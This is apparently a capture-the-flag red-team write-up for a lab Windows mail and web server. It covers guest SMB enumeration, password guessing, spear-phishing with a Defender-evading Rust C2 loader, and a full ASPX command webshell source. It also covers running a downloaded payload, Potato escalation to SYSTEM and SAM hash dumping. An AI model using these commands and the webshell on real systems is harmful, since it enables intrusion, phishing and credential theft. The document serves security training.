Syk0

Evasive

This box is provided by HackSmarter https://www.hacksmarter.org/

Objective and Scope

You are tasked with conducting a small red team operation on a Mail and Web Windows Server. The objective is to gain system access and extract any sensitive information that a threat actor could potentially use.

Here are some of the rules of engagement:

  1. The mail component is equipped with an anti-bruteforce mechanism. Do not get locked out as this will trip up an alert and the operation is over.
  2. Defender is on and up-to-date

Overview

Evasive is a HackSmarter red team simulation targeting a dual-purpose Windows Server running both a mail service and a web server. The engagement requires operating covertly - Windows Defender is active and up-to-date, and the mail server has anti-bruteforce protections in place that will terminate the operation if triggered.

The attack chain follows a realistic adversarial path:

  1. Recon - Enumerate open ports and services. Discover an accessible SMB share as a guest user containing internal PDF documents. Extract usernames and a default password from the PDF metadata. Identify that one user (roger) has an updated variation of the default password and can authenticate to the mail service.
  2. Foothold - Leverage the mail service to send a spear-phishing email to a target user (alfonso) with a malicious executable attached. The executable is a custom Rust-based loader that spawns an Adaptix C2 beacon, bypassing Defender. Wait for the callback and establish an agent on the target system.
  3. Post-Exploitation - Run Seatbelt for situational awareness. Locate and download sensitive files including a KeePass database, a PowerShell script, and a scheduled task binary. Decompile the binary to recover cleartext credentials. Extract the KeePass master password from process command-line history and open the database to retrieve the credit card flag.
  4. Privilege Escalation - Identify write access to the IIS webroot. Upload an ASPX webshell and use it to download and execute the Rust loader under the IIS service account context. Attempt GodPotato (detected), pivot to EfsPotato (undetected), and escalate to SYSTEM. Dump the local administrator NTLM hash using an Adaptix BOF.

Recon

Port Scanning

We begin with a standard Nmap scan to enumerate open services on the target. We run two scans in parallel: a default script and version scan against common ports, and a full all-ports scan to catch anything non-standard.

sudo nmap -sC -sV -vv -oA tcp 10.1.215.3 && sudo nmap -sC -sV -vv -p- -oA allports 10.1.215.3

The scan reveals the target is a Windows machine with HTTP (port 80), SMB (port 445), and mail-related ports open. This confirms the dual web/mail role described in the engagement brief.

Web Enumeration

We navigate to port 80 and find the default IIS welcome page, indicating a fresh or lightly configured Windows web server. No custom application is immediately visible.

We run a directory brute-force against the web server using ffuf with a large lowercase wordlist to discover any hidden endpoints, virtual paths, or hosted applications.

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.1.215.3/FUZZ -ic

While ffuf runs in the background, we pivot to enumerating the SMB service in parallel.

SMB Enumeration

We probe SMB using NetExec (nxc) with null/guest authentication to check what shares are accessible without credentials.

nxc smb 10.1.215.3 -u 'guest' -p '' --shares

The guest account has read access to at least one share - a significant misconfiguration on a corporate server. We use the spider_plus module to recursively enumerate all accessible files across available shares, writing the output to the current directory for review.

nxc smb 10.1.215.3 -u 'guest' -p '' -M spider_plus -o OUTPUT_FOLDER=.

The spider output reveals two PDF files in a docs share:

{
    "docs": {
        "mail_doc.pdf": {
            "atime_epoch": "2025-10-12 15:20:03",
            "ctime_epoch": "2025-10-12 15:20:01",
            "mtime_epoch": "2025-10-12 15:20:03",
            "size": "1.48 KB"
        },
        "old_user_setup_doc.pdf": {
            "atime_epoch": "2025-10-12 15:19:29",
            "ctime_epoch": "2025-10-12 15:19:29",
            "mtime_epoch": "2025-10-12 15:22:48",
            "size": "5.06 KB"
        }
    }
}

These look like internal IT documentation. We download both files by re-running spider_plus with the DOWNLOAD_FLAG option enabled.

nxc smb 10.1.215.3 -u 'guest' -p '' -M spider_plus -o OUTPUT_FOLDER=. DOWNLOAD_FLAG=True

PDF Metadata Extraction

Once the PDFs are downloaded locally, we use exiftool to extract their embedded metadata. PDF documents often retain author information, creation software, and other identifying details that were set when the document was created.

exiftool mail_doc.pdf > mail_exif
exiftool old_user_setup_doc.pdf > users_exif

The metadata reveals two usernames: roger and alfonso. These are likely internal employees and valid mail/system accounts on the target.

Reviewing the content of mail_doc.pdf, we learn that Alfonso is expecting an executable file from Roger over email. This is a critical piece of intelligence - it gives us a pretext to send a malicious executable to Alfonso that he will be likely to open, since he is already expecting one from Roger.

The old_user_setup_doc.pdf appears to be an old onboarding or IT setup document. It contains a default password for new users: NewUser2024!.

Credential Validation

We test the discovered default password against both users on the mail service and any other available authentication surface. The 2024 password variant does not work for either account.

Given the NewUser2024! pattern, we try NewUser2025! as a natural year-increment variation - a common behavior when users are forced to update passwords annually without changing the base pattern. We attempt this against Roger's mailbox on the mail server.

Failed attempt:

Successful attempt:

Roger's mailbox is accessible with NewUser2025!. We now have valid mail credentials. We confirm access using sendemail before proceeding to the foothold phase.

sendemail -s winserver01.hs -f [email protected] -t [email protected] -m "Job Application" -xu [email protected] -xp 'NewUser2025!'

Foothold

Payload Generation and Delivery

With confirmed access to Roger's mail account and the knowledge that Alfonso is expecting an executable from Roger, we set up our phishing delivery. We use a custom Rust-based loader https://github.com/0xsyk0/RustHarder to generate a binary (rr.exe) that, when executed, spawns an Adaptix C2 beacon back to our listener. The Rust loader is chosen specifically for its ability to evade Windows Defender, as it avoids common shellcode patterns and memory signatures that signature-based AV typically detects.

We send the malicious executable to Alfonso as an email attachment, impersonating Roger using his compromised credentials:

sendemail -s winserver01.hs -f [email protected] -t [email protected] -m "Exe app" -xu [email protected] -xp 'NewUser2025!' -a rr.exe

Alfonso is expecting this file, so the likelihood of execution is high. We wait for a callback on our Adaptix listener.

C2 Beacon Callback

The payload executes on Alfonso's machine and connects back to our Adaptix C2 framework. We now have an active agent running under Alfonso's user context.

Post-Exploitation Enumeration

With the agent active, we run Seatbelt - a comprehensive C# host enumeration tool that collects a wide range of system and user configuration data including running processes, scheduled tasks, installed software, credential manager entries, environment variables, and more. This gives us a full picture of the environment and helps identify privilege escalation paths and sensitive data locations. Note that Seatbelt can take around 20 minutes to complete a full run.

Sensitive File Discovery and Extraction

From the Seatbelt output and manual exploration, we identify several high-value files to download:

  • Database.kdbx - A KeePass password database, likely containing stored credentials
  • mail.ps1 - A PowerShell script related to the mail functionality, potentially containing hardcoded credentials
  • C:\Windows\Tasks\mail\mail.exe - A scheduled task binary, suspicious due to its non-standard location under Tasks

We download all three files to our local machine for offline analysis.

Binary Decompilation

We decompile mail.exe using a .NET decompiler (such as dnSpy or ILSpy). The binary is a .NET assembly and its logic is fully recoverable in cleartext. Inside, we find the cleartext password for Alfonso's account hardcoded into the binary - likely used by the scheduled task to authenticate to the mail service programmatically.

Sensitive Document Discovery

During filesystem enumeration via the agent, we locate a file named merger_info.pdf. This appears to be confidential internal business documentation - the kind of sensitive information that a real threat actor would be most interested in exfiltrating.

KeePass Master Password Recovery

We check the process list and command-line arguments of running processes for any sensitive data. Windows logs the full command line used to launch processes, and it's common for administrators or scripts to pass credentials as arguments. In the process command-line history, we find the KeePass master password being passed as a parameter:

kWc42J10XfiNdQD

We use this password to open Database.kdbx locally and extract the stored credentials. The database contains credit card information, which serves as the flag for this engagement.

Privilege Escalation

IIS Webroot Write Access

During post-exploitation enumeration, we discover that Alfonso's user account has write access to the IIS webroot (C:\inetpub\wwwroot). This is a critical misconfiguration - any user who can write files to the webroot can place executable server-side scripts that will run under the IIS application pool identity.

ASPX Webshell Upload

We upload a classic ASPX webshell to the webroot. This shell accepts a command parameter via an HTTP POST request and executes it server-side using cmd.exe, returning the output to the browser. The IIS worker process (w3wp.exe) runs as a dedicated service account, giving us a new execution context separate from Alfonso.

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
 
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->

Second Beacon via IIS

Using the webshell, we issue a PowerShell command to download the Rust loader binary from our attacker-controlled server and save it to C:\Windows\Tasks\rr.exe - a writable location that blends in with the existing scheduled task artifacts.

We then use the webshell to execute the binary:

A new Adaptix agent connects back to our listener, this time running as the IIS service account (IIS APPPOOL\...). Service accounts in IIS often have elevated local privileges compared to standard users.

Potato Privilege Escalation

With a service account context, we attempt Potato-family privilege escalation techniques, which abuse Windows token impersonation privileges (SeImpersonatePrivilege) that are granted to service accounts by default. These techniques allow a process with impersonation rights to escalate to SYSTEM by coercing a privileged Windows service into authenticating to an attacker-controlled pipe or endpoint.

We first try GodPotato, a modern Potato variant effective on Windows Server 2019+. However, Defender detects and blocks the GodPotato binary.

We pivot to EfsPotato, which abuses the Windows Encrypting File System (EFS) RPC interface to achieve the same impersonation goal through a different code path. EfsPotato is not detected by Defender in this configuration.

EfsPotato successfully elevates our context to SYSTEM.

Credential Dumping

With SYSTEM-level access, we use an Adaptix BOF (Beacon Object File) to perform a hashdump - extracting NTLM hashes from the local SAM database. This yields the local Administrator hash, which can be used for Pass-the-Hash attacks, offline cracking, or lateral movement to other machines in the environment that share the same local admin password.